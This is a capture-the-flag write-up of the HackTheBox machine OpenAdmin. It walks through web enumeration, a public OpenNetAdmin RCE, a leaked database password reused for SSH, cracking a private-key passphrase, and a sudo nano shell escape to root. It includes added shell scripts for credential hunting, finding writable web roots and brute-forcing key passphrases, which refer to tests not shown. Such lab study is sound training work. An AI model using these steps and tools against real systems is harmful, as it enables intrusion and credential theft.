OpenAdmin Write-Up: HackTheBox


TL;DR

OpenAdmin was a fun, easy machine with an interesting internal web application. With only two open ports, SSH (22) and HTTP (80), the attack surface is minimal. Web enumeration revealed a few web applications, one of them an outdated OpenNetAdmin IP Address Management (IPAM) system (v18.1.1) with a public RCE exploit that gave us a shell as www-data. System enumeration then turned up a database password in the ONA config, which the jimmy user had reused for SSH. Jimmy was in a group with write access to an internal web application whose main.php prints the SSH private key of another user (joanna); the key was passphrase-protected, but the passphrase fell quickly to john. Joanna had sudo rights to run nano against a single file, which, with the help of GTFOBins, gave us a root shell.

Nmap Port Scan

The full-port scan shows only two ports open: 22 (SSH) and 80 (HTTP).

nmap -sCV -p- -oN nmap/openadmin-full 10.10.10.171

Web Enumeration

Directory brute-forcing revealed several directories.

Command used: rustbuster dir -u http://10.10.10.171 -w /opt/SecLists/Discovery/Web-Content/common.txt -t 25

Two of them are worth a closer look. The first is a music site; clicking its Login link takes us to an ONA interface:

http://10.10.10.171/music/

The second is the ONA application itself, an OpenNetAdmin IP Address Management (IPAM) system, version 18.1.1:

http://10.10.10.171/ona/

OpenNetAdmin Exploitation

Searchsploit revealed a couple of exploits for this version, one Metasploit module and one standalone bash script.

Copying the bash script directly from searchsploit left a few stray carriage returns and similar junk (CRLF line endings), so the script needed a little cleanup before it would run. After that it worked and gave us a rudimentary shell as www-data.

I uploaded, upgraded and executed a proper php shell.

Post-Exploitation

Time to enumerate! A quick (and noisy) recursive grep for credential-looking strings turned up the ONA database configuration:

Command used: egrep -R 'password|pass'

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

Awesome, we have the ona_sys database password! Logging into the database with it and dumping the ONA tables gives some password hashes.
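A bare egrep for 'password|pass' also matches every "passed", "bypass" and empty placeholder on the box. The function below is an added example for this write-up, not the author's command: it only reports a key such as password, db_passwd, secret, api_key or token that is actually assigned a quoted, non-empty value, skips binaries and the usual noise directories, and assumes GNU grep. The config file and README in the test are constructed fixtures.

```shell
#!/bin/sh
# hunt_creds DIR : recursive search for credential-looking assignments in
# text files under DIR (default: current directory). Assumes GNU grep.
hunt_creds() {
  dir="${1:-.}"
  # -r recurse, -I skip binary files, -n line numbers, -i case-insensitive,
  # -E extended regex. The pattern wants a key name (optionally quoted),
  # then =>, = or :, then a quoted value of at least 4 characters, so
  # prose like "all tests passed" and placeholders like password = '' are
  # not reported, unlike a plain grep for 'pass'.
  grep -rInE -i \
    --exclude-dir=.git --exclude-dir=node_modules --exclude='*.min.js' \
    "(passw(or)?d|pwd|secret|api[_-]?key|token)[[:alnum:]_]*['\"]?[[:space:]]*(=>|=|:)[[:space:]]*['\"][^'\"]{4,}['\"]" \
    "$dir"
}

# Stand-alone usage on a target: sh hunt_creds.sh /var/www
if [ "$#" -ge 1 ]; then
  hunt_creds "$1"
fi
```

Run it against /var/www, /etc and home directories first; the ONA config above is exactly the kind of hit it is built to surface while leaving the framework's documentation out of the output.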

Getting Jimmy

The hashes were essentially useless. But we have another way: /etc/passwd reveals two regular users, jimmy and joanna, and trying jimmy with the database password n1nj4W4rri0R! over SSH gets us a session (classic password reuse). Running LinPEAS from that session turns up some interesting finds.

Both jimmy and joanna are members of a group that has write access to /var/www/internal. A quick telnet/curl to the unusual listening port shows an Apache instance serving internal.openadmin.htb, so that directory is almost certainly its document root. That combination matters: write access to a served document root means anything we drop in it, a PHP file for instance, is executed by that Apache instance under whatever user it runs as. Let's check out that directory.
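The check behind that deduction is worth automating: for every Apache virtual host, which address/port it listens on, what its DocumentRoot is, and whether the current user can write there. The function below is an added example (not from the original post); it assumes the Debian/Ubuntu sites-enabled layout and document roots without spaces. The vhost config in the test is constructed, and 127.0.0.1:8080 is a placeholder, not the port from the box.

```shell
#!/bin/sh
# vhost_roots CONFDIR : print "listen_addr  server_name  docroot  writable|not-writable"
# for every <VirtualHost> block in the Apache config files under CONFDIR
# (default: /etc/apache2/sites-enabled). Assumes one block per file section and
# DocumentRoot paths without whitespace.
vhost_roots() {
  confdir="${1:-/etc/apache2/sites-enabled}"
  for f in "$confdir"/*; do
    [ -f "$f" ] || continue
    awk '
      /<VirtualHost/ { sub(/.*<VirtualHost[ \t]+/, ""); sub(/>.*/, ""); addr = $0 }
      /^[ \t]*ServerName[ \t]/   { name = $2 }
      /^[ \t]*DocumentRoot[ \t]/ { root = $2; gsub(/"/, "", root) }
      /<\/VirtualHost>/ {
        print addr, (name == "" ? "-" : name), (root == "" ? "-" : root)
        addr = name = root = ""
      }
    ' "$f"
  done | while read -r addr name root; do
    # -w is evaluated as the current user, so run this as each user you land as
    if [ "$root" != "-" ] && [ -w "$root" ]; then w=writable; else w=not-writable; fi
    printf '%s\t%s\t%s\t%s\n' "$addr" "$name" "$root" "$w"
  done
}

# Stand-alone usage on a target: sh vhost_roots.sh /etc/apache2/sites-enabled
if [ "$#" -ge 1 ]; then
  vhost_roots "$1"
fi
```

A "writable" line whose address is a localhost port is the finding from this box: a vhost you can only reach after landing on the host, whose code you can change.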

It turns out main.php hands Joanna's SSH private key to anyone with a logged-in session:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Easy enough.

The key is passphrase-protected, so we convert it to a john hash and crack it:

/usr/share/john/ssh2john.py joanna.key > joanna.hash

john joanna.hash --wordlist=/usr/share/wordlists/rockyou.txt

John made quick work of it, even in a VM: the passphrase is bloodninjas.
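John is the right tool for a rockyou-sized list, but on an attack VM without it the same check can be done with nothing but ssh-keygen, which prints the public key and exits 0 only when the passphrase is correct. This is an added example, not the post's own method; the ed25519 key and the four-word wordlist in the test are constructed, with bloodninjas used as the known answer.

```shell
#!/bin/sh
# crack_ssh_key KEYFILE WORDLIST : try each line of WORDLIST as the passphrase
# of an encrypted OpenSSH private key. Prints the passphrase and returns 0 on
# success, returns 1 when the list is exhausted. Slow for large lists: keys in
# the new OpenSSH format use a bcrypt KDF, so each guess costs tens of ms.
crack_ssh_key() {
  key="$1"
  wordlist="$2"
  # "|| [ -n "$cand" ]" keeps a last line that lacks a trailing newline
  while IFS= read -r cand || [ -n "$cand" ]; do
    # stdin from /dev/null so ssh-keygen can never fall back to an interactive prompt
    if ssh-keygen -y -P "$cand" -f "$key" </dev/null >/dev/null 2>&1; then
      printf '%s\n' "$cand"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# Stand-alone usage: sh crack_ssh_key.sh joanna.key /usr/share/wordlists/rockyou.txt
if [ "$#" -ge 2 ]; then
  crack_ssh_key "$1" "$2"
fi
```

Because ssh-keygen is invoked once per guess, use this for short, targeted lists (the "ninja" hint from main.php, for example) and leave rockyou to john.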

Moving to Joanna

We get in and capture user.txt.

Privilege Escalation

Interesting sudo finding: Joanna is allowed to run /bin/nano on /opt/priv through sudo.

GTFOBins shows that nano can spawn a shell from inside the editor: press Ctrl-R then Ctrl-X to open nano's "command to execute" prompt and run `reset; sh 1>&0 2>&0` there, which attaches a shell to nano's terminal. Since nano is started via sudo, that shell is root. Let's try it.

sudo /bin/nano /opt/priv

Got Root! Thanks for reading.